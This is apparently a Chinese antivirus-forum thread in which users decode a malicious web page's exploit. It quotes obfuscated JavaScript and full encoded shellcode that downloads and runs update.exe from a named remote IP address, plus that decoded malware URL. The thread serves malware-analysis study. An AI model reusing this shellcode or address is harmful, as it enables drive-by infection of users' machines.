今天做这个，不知道怎么做。请大侠们指点一下，这个真让我头痛
地址：http://bbs.ikaka.com/showtopic-8668365.aspx

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; icafe8)

那个是国外网马，你先看国内的吧。有空了再去看哪个，不过ms已经失效了。

什么时候还有恶意网站交流区网马解密悬赏活动啊

面包会有的，多关注论坛吧

里面隐藏的链接http://213.163.89.54/lib/update.php?id=0不过不能获取到下一步了
我尝试在里面找东西，这里可以提供一点我的分析思路~，不过没结果也不知道是否正确
'xyzument'.replace(/xyz/g, 'doc')]['zyxElementById'.replace(/zyx/g, 'get')]('oldDummy')['valyxz'.replace(/yxz/g, 'ue')]['xzyplace'.replace(/xzy/g, 're')](/[b7pi8]/g, '')]
我觉得应该就是：document.getElementByld('oldDummy').value.replace(/[b7pi8]/g,' ')
刚查阅了一下value.replace(/[XYZ]/g,'')正则表达式的用法是匹配[]中的任意一个字符成功即可替换；
当然还有很多：例如（/[\(_x1a]/g, ''）是表示为该串第一个字符是_且后面有可能有x1a的即替换；
还有^是匹配第一字符在[]中的用法是[^xyz]| 否定字符集合，匹配非括号内的任何字符。
$ 匹配输入的末尾。
*  匹配前一个字符零或多次。例如，"zo*" 与 "z" 或 "zoo" 匹配。
+ 匹配前一个字符一次或多次。例如，"zo+" 与 "zoo" 匹配，但和 "z" 不匹配。 
? 匹配前一个字符零或一次。例如，"a?ve?" 和 "never" 中的 "ve" 匹配。
.  匹配除换行字符外的任何单个字符。
那代码里有(/[\.NZ\),]/g, '')还有(/[\^s\+\:z]/g, '')等等~
相应意思还要自己理解~
这上面这段和加密方法有关系没有我也不太清楚，权当学习吧，我认为可能和41期的替换还是类似的~

能不能把过程写一下啊

过几天就要设计了，好像没有多少时间上网了

网马地址失效获取不了代码怎么写过程啊~只能从初始的PHP文件分析着走~

'%su:5:3^5s0z%:us5z2s5+1z%+u:5+7z5:6+%su^9^cz5^5^%:uz0+0se^8s%^u:0s0:0:0:%+us5+ds0z0s%zuze:d+8z3s%^us3s1z0sd:%^u:6s4scs0z%+u:4:0^0z3s%sus7z8+3+0+%+uz8^bs0sc^%zu^0+c^4z0s%+us7+0^8:b^%+u:azd:1+c:%su^4^0+8zb^%+uze:b:0:8+%su+8^bz0^9z%:uz3^4z4+0s%+uz4:0+8zdz%:uz8^b+7^c:%+u+3:c+4^0z%:uz5+7+5+6:%su:5:e+b^e^%^u:0s0:0^1s%:u+0z1s0z0+%susbzf^eze^%:us0^1s4:e^%zu:0z0:0z0s%susezf^0+1s%+u:d^6se^8^%sus0:0z0+1+%^u:5:fs0+0^%^uz8:9s5ses%^u+8s1zezas%su+5ze^c^2z%su:0+0s0^1z%+u^5s2s0+0:%su:8z0z6z8z%+us0:0^0z0z%+u:f:fz0z0z%+u+4+e^9^5:%zu^0:0+0s1^%zu^8z9:0z0z%+u+8^1^esaz%zu:5+escz2:%zu^0^0s0s1z%+u+3^1+0+0:%zuz0s1^fz6s%zu+8^a^c+2z%:u:3:5+9+c+%su:0s2:6+3z%+u^0s0+0s0:%+usf:b+8z0s%^uz7^4s0:0:%^u:8^8s0+6+%su+3+2^1scs%^uzezbz4^6z%+uzcz6:e^es%^u:3z2:0z4:%:uz8^9+0+0+%^uz8+1:e:a+%suz4+5zc^2z%+u+0+0s0:2^%^u:5+2:0z0z%zu:9^5:f^fz%+uz0z1+5:2^%+u:0+0z0+0^%^u^ezas8s9+%^uzc^2z8s1s%zu^0^2z5+0:%^u^0^0z0+0^%su+5^0+5:2s%^u^9:5zfzf^%sus0^1^5+6s%^uz0z0^0^0z%:us0+0s6:as%zu:0:0z6^a^%^u:e:a^8:9z%:u:c:2^8s1z%^uz0+1+5zes%+u+0s0s0+0+%suz8^9+5^2z%su^8s1se:a+%zu^7z8+c:2:%zu:0+0s0s2z%zus5^2:0+0z%^u+0s0z6za^%+usd^0+fsf:%+u:0+5s6+as%^usesas8+9s%+u+c^2+8z1s%^uz0:1^5:e+%^u+0^0z0z0^%susf:f:5:2:%zu+5+az9z5+%+uz0s0z0:1s%^us8s9+0+0:%:u+8^1^e+az%suz5^e:c+2z%+uz0:0s0z1s%^uz5^2^0z0s%^u:8:0+6z8z%:us0z0z0:0z%+uzf:fz0^0^%^u:4+ez9z5^%zu+0z0z0+1:%^u+8z9+0s0s%+u^8+1zesas%zu^5:e+c^2z%+u+0^0z0:1s%:us3z1^0^0s%^u^0:1^f+6+%:uz8:a:cz2+%zu^3+5s9+c^%zu^0^2z6+e+%su+0^0^0s0:%:u+fzbs8^0:%zu^7^4+0s0^%+uz8s8s0:6z%su^3+2s1+c+%zusezb:4z6s%zuzc:6^esez%^us3:2s0:4:%su:8s9^0+0^%zuz8+1+esa+%zus4z5:c:2z%:uz0s0s0:2z%zu+5s2z0s0+%:u:9^5sf^fz%+u+0z1+5+2s%su^0^0s0^0z%+use^a^8+9s%susc:2s8+1s%su:0z2:5:0+%zu:0^0:0z0+%+u:5^0+5s2:%+us9:5zf^f^%+uz0z1^5s6z%+uz0:0:0+0:%su^0^0+6za+%su+0^0z6za:%+uze:az8^9z%+usc:2z8z1+%su:0^1z5zez%suz0+0:0^0s%:u+8+9s5:2:%zu:8z1^e:az%zuza:6+cs2z%zuz0s0z0^2+%+u:5+2+0z0^%su+0+0:6saz%:u:d:0sf^f+%:u^0+5s6:az%:uzesa:8s9^%zu:cz2:8z1:%^uz0z1z5:es%^u^0+0+0+0+%susf^f:5z2s%+u^5^as9^5^%zu^0+0z0:1s%^us9:d^0z0s%+uz5^f:5+ds%sus5saz5^e^%+uz5+b+5+9^%suzc:3+5^8:%:us0:0:0z0s%^u^0+0^0s0^%+uz0z0:0^0s%^u^0^0+0+0s%:u^0^0s0^0s%:u+0z0z0z0:%su:0+0^0z0^%:us0+0z0z0^%+u+6:5+4^7+%^uz5^4+7^4s%^u:6zds6:5:%suz5z0z7:0z%+u^7+4s6^1s%:u:4z1^6:8:%:u+4sc^0:0:%^us6s1^6zf+%+uz4zc+6+4s%+us6^2+6+9+%suz6z1z7z2+%suz7+9:7+2:%+u:0^0:4z1^%:u+6z5+4^7z%:uz5:0^7:4z%su^6^f+7z2^%zu^4+1s6:3s%^us6s4+6:4^%:us6+5s7^2+%:us7:3z7+3s%:u^5z7^0:0s%:uz6se:6:9s%+u^7z8z4^5:%su^6z3+6z5+%su+bzb^0^0:%zu+f+2z8+9s%zuzfz7:8z9:%+uscz0s3s0s%zu:7s5:a:e:%su^2:9:f^d+%zus8s9zfs7z%^u:3^1zf:9s%:u^b:e^cz0^%zus0:0z3scs%+uz0s0^0+0+%^usb^5^0s3:%:u:0s2s1zbs%suz0s0s0^0:%zuza:ds6:6+%+us8s5s0+3+%zu^0:2+1sb^%^us0s0z0:0^%^us7^0s8sb+%sus8z3^7z8:%sus1+c+c:6^%zu:bs5:0^3s%+us0+2+1:b+%su:0z0z0+0^%^u^b^d^8+d+%:u:0z2z1sf^%zu^0s0s0+0^%^u:0:3+a^d+%:us1sbz8:5+%^uz0s0:0^2^%:u+azb:0s0z%^u+0s3+a^ds%su^1+b+8:5z%^uz0+0^0+2^%^us5z0+0z0^%susa+d^a^b+%zus8z5^0z3+%+u+0z2^1+b+%su+0z0s0s0s%:u:5seza^bs%zuzdsb+3s1:%zus5z6^a+d:%su+8s5z0z3z%^uz0+2z1+b+%sus0z0s0z0:%zuzcz6^8:9+%suzd:7z8z9:%zu^f:c:5s1:%suzas6+fs3+%^uz7^4+5+9z%su^5sez0+4z%^u+e^bz4+3s%:u^5+eze+9+%zu+d:1+9+3+%su^0:3zes0z%+u+2:7:8s5^%zu^0+0z0s2:%zu:3:1^0z0^%:uz9:6^fz6s%zusazdz6s6z%^u^e^0:cs1^%+us0z3+0^2:%zu:1+fs8s5^%zu+0z0z0^2s%zu+8z9+0:0s%:uzazdzc+6s%:u^8s5s0z3:%^uz0s2+1:b^%+u^0s0z0:0s%^uzezb:cz3s%+u:0+0^1s0:%+u:0^0:0:0+%+u^0:0:0s0z%sus0z0z0^0+%^u^0:0s0z0:%^uz0:0+0z0+%zu+0z0s0s0s%^u:0:0z0+0+%^us8+9+0+0z%su^1:bz8+5^%zu^0:0s0z2+%:u+5:6+0z0z%zu^e^8^5z7+%^u^f^f:5^8^%^u+fzf^f:f:%zu^5:e^5zfs%^u+0z1:a:b^%+us8z0sc^ez%^uzb:b^3+e:%zu:0z2^7:4s%^u+e:dzesb^%:u+5z5zcz3:%:u:4^c+5s2s%su^4:f^4+d^%sus2^es4:e^%zuz4zc+4s4z%:uz0s0z4zc+%suz5+2^5s5:%^uz4^4+4+cs%^u:7+7s6sfz%^u^6zc^6:es%+u+6s1s6zfz%zuz5+4s6s4z%zu:4s6:6^f:%+us6scs6+9:%su:4z1+6:5+%+us7+5^0:0z%zus6^4z7z0:%zus7+4^6z1:%:u+2^ez6:5:%^u+7z8z6+5z%+u^0+0s6^5^%zus7:2^6+3s%zuz7^3^6:1s%zuz2+e^6^8:%+u^6^8+7^0z%^u^0:0s7+0s%zu:7z4:6:8z%:us7^0z7+4z%^uz2:f^3^a+%:u:3z2z2sf+%:u^3s3s3z1^%:u+3:1:2ze^%^uz3+3+3s6s%^u:3^8^2se:%^u+2zes3^9:%:uz3z4:3+5+%^u+6sc:2zf^%zu+6^2+6s9:%+us7^5z2sf^%zu:6:4^7^0+%su+7^4z6z1+%zus2zez6:5z%su+6z8z7+0+%su+3sf+7z0+%zu:6+4^6:9+%:u:3+1z3sd:%:u^9z0s0:0s

整理上面得到shellcode如下

'%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7500%u6470%u7461%u2e65%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u322f%u3331%u312e%u3336%u382e%u2e39%u3435%u6c2f%u6269%u752f%u6470%u7461%u2e65%u6870%u3f70%u6469%u313d%u9000

解密：
http://213.163.89.54/lib/update.php?id=1

不知道对不对

对的